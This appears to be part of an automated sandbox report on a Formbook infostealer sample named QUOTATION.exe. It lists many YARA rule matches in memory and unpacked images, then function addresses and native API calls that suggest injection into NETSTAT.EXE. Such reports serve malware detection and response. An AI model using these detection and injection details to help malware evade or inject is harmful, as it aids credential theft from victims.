          Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: QUOTATION.exe
          Source: QUOTATION.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 1_2_00DAE7781_2_00DAE778
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 1_2_00DAE76B1_2_00DAE76B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 1_2_00DABDC41_2_00DABDC4
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 1_2_003620501_2_00362050
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 13_2_0033205013_2_00332050
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0040103017_2_00401030
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041E88717_2_0041E887
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041D96917_2_0041D969
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00402D9017_2_00402D90
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00409E5B17_2_00409E5B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00409E6017_2_00409E60
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041DFCE17_2_0041DFCE
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00402FB017_2_00402FB0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEB09017_2_00FEB090
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA83017_2_00FFA830
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109100217_2_01091002
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010AE82417_2_010AE824
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF99BF17_2_00FF99BF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010020A017_2_010020A0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A20A817_2_010A20A8
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF412017_2_00FF4120
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A28EC17_2_010A28EC
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDF90017_2_00FDF900
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A2B2817_2_010A2B28
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0107CB4F17_2_0107CB4F
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100138B17_2_0100138B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100EBB017_2_0100EBB0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010903DA17_2_010903DA
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100ABD817_2_0100ABD8
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109DBD217_2_0109DBD2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010823E317_2_010823E3
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0108FA2B17_2_0108FA2B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A22AE17_2_010A22AE
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFAB4017_2_00FFAB40
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094AEF17_2_01094AEF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA30917_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A2D0717_2_010A2D07
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A1D5517_2_010A1D55
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100258117_2_01002581
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB47717_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D8217_2_01092D82
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A25DD17_2_010A25DD
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE841F17_2_00FE841F
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FED5E017_2_00FED5E0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109D46617_2_0109D466
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109449617_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD0D2017_2_00FD0D20
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010ADFCE17_2_010ADFCE
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF6E3017_2_00FF6E30
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A1FF117_2_010A1FF1
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109D61617_2_0109D616
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A2EF717_2_010A2EF7
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0052205017_2_00522050
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03312B2824_2_03312B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A30924_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326AB4024_2_0326AB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0327EBB024_2_0327EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032F23E324_2_032F23E3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0330DBD224_2_0330DBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_033003DA24_2_033003DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0327ABD824_2_0327ABD8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032FFA2B24_2_032FFA2B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_033122AE24_2_033122AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF24_2_03304AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326412024_2_03264120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0324F90024_2_0324F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032699BF24_2_032699BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0331E82424_2_0331E824
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A83024_2_0326A830
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0330100224_2_03301002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032720A024_2_032720A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_033120A824_2_033120A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0325B09024_2_0325B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_033128EC24_2_033128EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03311FF124_2_03311FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0331DFCE24_2_0331DFCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03266E3024_2_03266E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0330D61624_2_0330D616
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03312EF724_2_03312EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03240D2024_2_03240D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03312D0724_2_03312D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03311D5524_2_03311D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0327258124_2_03272581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03302D8224_2_03302D82
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0325D5E024_2_0325D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_033125DD24_2_033125DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0325841F24_2_0325841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0330D46624_2_0330D466
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0330449624_2_03304496
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074E88724_2_0074E887
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_00732D9024_2_00732D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_00739E6024_2_00739E60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_00739E5B24_2_00739E5B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_00732FB024_2_00732FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0324B150 appears 133 times
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: String function: 00FDB150 appears 136 times
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041A360 NtCreateFile,17_2_0041A360
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041A410 NtReadFile,17_2_0041A410
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041A490 NtClose,17_2_0041A490
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041A540 NtAllocateVirtualMemory,17_2_0041A540
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041A35B NtCreateFile,17_2_0041A35B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041A40A NtReadFile,17_2_0041A40A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041A48A NtClose,17_2_0041A48A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041A53C NtAllocateVirtualMemory,17_2_0041A53C
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019910 NtAdjustPrivilegesToken,LdrInitializeThunk,17_2_01019910
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010199A0 NtCreateSection,LdrInitializeThunk,17_2_010199A0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019840 NtDelayExecution,LdrInitializeThunk,17_2_01019840
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019860 NtQuerySystemInformation,LdrInitializeThunk,17_2_01019860
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010198F0 NtReadVirtualMemory,LdrInitializeThunk,17_2_010198F0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019A00 NtProtectVirtualMemory,LdrInitializeThunk,17_2_01019A00
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019A20 NtResumeThread,LdrInitializeThunk,17_2_01019A20
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019A50 NtCreateFile,LdrInitializeThunk,17_2_01019A50
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019540 NtReadFile,LdrInitializeThunk,17_2_01019540
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010195D0 NtClose,LdrInitializeThunk,17_2_010195D0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019710 NtQueryInformationToken,LdrInitializeThunk,17_2_01019710
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019780 NtMapViewOfSection,LdrInitializeThunk,17_2_01019780
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010197A0 NtUnmapViewOfSection,LdrInitializeThunk,17_2_010197A0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019660 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_01019660
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010196E0 NtFreeVirtualMemory,LdrInitializeThunk,17_2_010196E0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019950 NtQueueApcThread,17_2_01019950
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010199D0 NtCreateProcessEx,17_2_010199D0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019820 NtEnumerateKey,17_2_01019820
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0101B040 NtSuspendThread,17_2_0101B040
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010198A0 NtWriteVirtualMemory,17_2_010198A0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019B00 NtSetValueKey,17_2_01019B00
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0101A3B0 NtGetContextThread,17_2_0101A3B0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019A10 NtQuerySection,17_2_01019A10
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019A80 NtOpenDirectoryObject,17_2_01019A80
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019520 NtWaitForSingleObject,17_2_01019520
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0101AD30 NtSetContextThread,17_2_0101AD30
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019560 NtWriteFile,17_2_01019560
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010195F0 NtQueryInformationFile,17_2_010195F0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0101A710 NtOpenProcessToken,17_2_0101A710
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019730 NtQueryVirtualMemory,17_2_01019730
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019760 NtOpenProcess,17_2_01019760
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0101A770 NtOpenThread,17_2_0101A770
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019770 NtSetInformationFile,17_2_01019770
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019FE0 NtCreateMutant,17_2_01019FE0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019610 NtEnumerateValueKey,17_2_01019610
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019650 NtQueryValueKey,17_2_01019650
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01019670 NtQueryInformationProcess,17_2_01019670
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010196D0 NtCreateKey,17_2_010196D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289A50 NtCreateFile,LdrInitializeThunk,24_2_03289A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289910 NtAdjustPrivilegesToken,LdrInitializeThunk,24_2_03289910
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032899A0 NtCreateSection,LdrInitializeThunk,24_2_032899A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289860 NtQuerySystemInformation,LdrInitializeThunk,24_2_03289860
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289840 NtDelayExecution,LdrInitializeThunk,24_2_03289840
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289710 NtQueryInformationToken,LdrInitializeThunk,24_2_03289710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289780 NtMapViewOfSection,LdrInitializeThunk,24_2_03289780
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289FE0 NtCreateMutant,LdrInitializeThunk,24_2_03289FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289660 NtAllocateVirtualMemory,LdrInitializeThunk,24_2_03289660
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289650 NtQueryValueKey,LdrInitializeThunk,24_2_03289650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032896E0 NtFreeVirtualMemory,LdrInitializeThunk,24_2_032896E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032896D0 NtCreateKey,LdrInitializeThunk,24_2_032896D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289540 NtReadFile,LdrInitializeThunk,24_2_03289540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032895D0 NtClose,LdrInitializeThunk,24_2_032895D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289B00 NtSetValueKey,24_2_03289B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0328A3B0 NtGetContextThread,24_2_0328A3B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289A20 NtResumeThread,24_2_03289A20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289A00 NtProtectVirtualMemory,24_2_03289A00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289A10 NtQuerySection,24_2_03289A10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289A80 NtOpenDirectoryObject,24_2_03289A80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03289950 NtQueueApcThread,24_2_03289950
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032899D0 NtCreateProcessEx,24_2_032899D0
